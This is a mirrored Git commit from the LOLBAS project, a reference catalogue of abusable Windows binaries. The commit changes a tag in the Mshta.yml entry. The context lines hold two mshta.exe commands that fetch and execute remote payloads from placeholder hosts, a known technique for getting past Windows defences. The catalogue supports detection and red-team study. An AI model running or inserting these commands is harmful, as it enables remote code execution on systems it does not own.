public-mirrors/LOLBAS
1
0
Fork 0
mirror of https://github.com/LOLBAS-Project/LOLBAS synced 2024-12-30 16:54:00 +01:00
Code Issues Projects Releases Wiki Activity

Update Mshta.yml Tags

Browse Source 
Changed Execute: WSH to HTA
This commit is contained in:
hegusung 2024-10-13 18:08:27 +02:00 committed by GitHub
parent e07907c473
commit c34810b29b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
yml/OSBinaries/Mshta.yml
View File

@ -12,7 +12,7 @@ Commands:
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags: Tags:
- Execute: WSH - Execute: HTA
- Execute: Remote - Execute: Remote
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")")) - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument. Description: Executes VBScript supplied as a command line argument.
@ -40,7 +40,7 @@ Commands:
MitreID: T1218.005 MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer) OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags: Tags:
- Execute: WSH - Execute: HTA
- Command: mshta.exe https://example.com/payload - Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in INetCache. Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Usecase: Downloads payload from remote server